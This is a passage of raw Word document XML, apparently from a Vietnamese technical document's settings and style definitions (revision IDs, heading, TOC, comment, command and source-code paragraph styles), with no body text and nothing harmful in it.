    <w:rsid w:val="52F39C6F"/>
    <w:rsid w:val="539A95DB"/>
    <w:rsid w:val="5410E961"/>
    <w:rsid w:val="5459800E"/>
    <w:rsid w:val="54FF2B9A"/>
    <w:rsid w:val="55CBB4CC"/>
    <w:rsid w:val="55E3FEED"/>
    <w:rsid w:val="5624B0EB"/>
    <w:rsid w:val="563CA449"/>
    <w:rsid w:val="565D082C"/>
    <w:rsid w:val="56BEDE02"/>
    <w:rsid w:val="56BF5F92"/>
    <w:rsid w:val="570592AA"/>
    <w:rsid w:val="571B4A29"/>
    <w:rsid w:val="5885C82B"/>
    <w:rsid w:val="5972783D"/>
    <w:rsid w:val="5987E1B5"/>
    <w:rsid w:val="5A4E65A9"/>
    <w:rsid w:val="5A839332"/>
    <w:rsid w:val="5B4B7CE1"/>
    <w:rsid w:val="5BAEA948"/>
    <w:rsid w:val="5BE3C39D"/>
    <w:rsid w:val="5D5AEB70"/>
    <w:rsid w:val="5DC257CF"/>
    <w:rsid w:val="5DDB3E4F"/>
    <w:rsid w:val="5E623E1F"/>
    <w:rsid w:val="5ED9C9F8"/>
    <w:rsid w:val="5F8C2C69"/>
    <w:rsid w:val="5FADDEBE"/>
    <w:rsid w:val="5FC449B6"/>
    <w:rsid w:val="5FF30289"/>
    <w:rsid w:val="6106C0A4"/>
    <w:rsid w:val="618DE917"/>
    <w:rsid w:val="61A19608"/>
    <w:rsid w:val="62087589"/>
    <w:rsid w:val="63DC4045"/>
    <w:rsid w:val="6495AEEB"/>
    <w:rsid w:val="661BFBB4"/>
    <w:rsid w:val="6690CDF9"/>
    <w:rsid w:val="66A9CAB2"/>
    <w:rsid w:val="66BAF37B"/>
    <w:rsid w:val="66EF30E0"/>
    <w:rsid w:val="66FAEB58"/>
    <w:rsid w:val="67D0F1D7"/>
    <w:rsid w:val="6919C64E"/>
    <w:rsid w:val="69B8283A"/>
    <w:rsid w:val="69D98352"/>
    <w:rsid w:val="6A4B81C9"/>
    <w:rsid w:val="6A6622DB"/>
    <w:rsid w:val="6A6B461F"/>
    <w:rsid w:val="6B5803A0"/>
    <w:rsid w:val="6BA8824C"/>
    <w:rsid w:val="6BE45458"/>
    <w:rsid w:val="6C489E71"/>
    <w:rsid w:val="6D4CB266"/>
    <w:rsid w:val="6E507ECF"/>
    <w:rsid w:val="6E788E86"/>
    <w:rsid w:val="6F11AF52"/>
    <w:rsid w:val="6F45F84A"/>
    <w:rsid w:val="6FA5D4B0"/>
    <w:rsid w:val="713D0A32"/>
    <w:rsid w:val="7184F6D4"/>
    <w:rsid w:val="7248F605"/>
    <w:rsid w:val="731D3D68"/>
    <w:rsid w:val="7363625C"/>
    <w:rsid w:val="73AC1041"/>
    <w:rsid w:val="76C96F88"/>
    <w:rsid w:val="76CCBD37"/>
    <w:rsid w:val="77680D99"/>
    <w:rsid w:val="77D9E93E"/>
    <w:rsid w:val="783D5489"/>
    <w:rsid w:val="7871269B"/>
    <w:rsid w:val="789E8739"/>
    <w:rsid w:val="78ACACD5"/>
    <w:rsid w:val="7B2FD97D"/>
    <w:rsid w:val="7B4A061B"/>
    <w:rsid w:val="7C6BFC6E"/>
    <w:rsid w:val="7C756DA8"/>
    <w:rsid w:val="7DC330E7"/>
    <w:rsid w:val="7EABC9F0"/>
    <w:rsid w:val="7F23DBD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473CBD1B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0CFB6FB2-1704-4927-8BD8-53E1F3A1ABF2}"/>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31173D"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00CA4DC8"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="240"/>
      <w:ind w:left="567" w:hanging="567"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000634C0"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="6"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="630" w:hanging="630"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009B135C"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading7Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading8Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading9Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iC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yperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rsid w:val="00CA4DC8"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:kern w:val="36"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="000634C0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rsid w:val="009B135C"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading5Char" w:customStyle="1">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading6Char" w:customStyle="1">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtHinh" w:customStyle="1">
    <w:name w:val="_txtHinh"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="0005062D"/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading7Char" w:customStyle="1">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading8Char" w:customStyle="1">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading9Char" w:customStyle="1">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="261"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="522"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="782"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1040"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1300"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="1820"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="2080"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentTextChar" w:customStyle="1">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:styleId="HeaderChar" w:customStyle="1">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="38"/>
      <w:szCs w:val="38"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TitleChar" w:customStyle="1">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:spacing w:val="-10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentSubjectChar" w:customStyle="1">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0"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locked/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="0" w:line="252" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:color w:val="365F91"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtHoaThi" w:customStyle="1">
    <w:name w:val="_txtHoaThi"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00501E1D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:ind w:left="284" w:hanging="284"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtCommand" w:customStyle="1">
    <w:name w:val="_txtCommand"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="009F5AB1"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtHinhVe" w:customStyle="1">
    <w:name w:val="_txtHinhVe"/>
    <w:basedOn w:val="txtHoaThi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00180B9D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtNoiDung" w:customStyle="1">
    <w:name w:val="_txtNoiDung"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtGachDong" w:customStyle="1">
    <w:name w:val="_txtGachDong"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="363"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtSource" w:customStyle="1">
    <w:name w:val="_txtSource"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00400197"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="644" w:firstLine="284"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtTieuDe01" w:customStyle="1">
    <w:name w:val="_txtTieuDe01"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="567" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtTieuDe02" w:customStyle="1">
    <w:name w:val="_txtTieuDe02"/>
    <w:basedOn w:val="TOCHeading"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="txtTieuDe03" w:customStyle="1">
    <w:name w:val="_txtTieuDe03"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="nil"/>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Grid0" w:customStyle="1">
    <w:name w:val="TableGrid"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
    <w:tblPr>
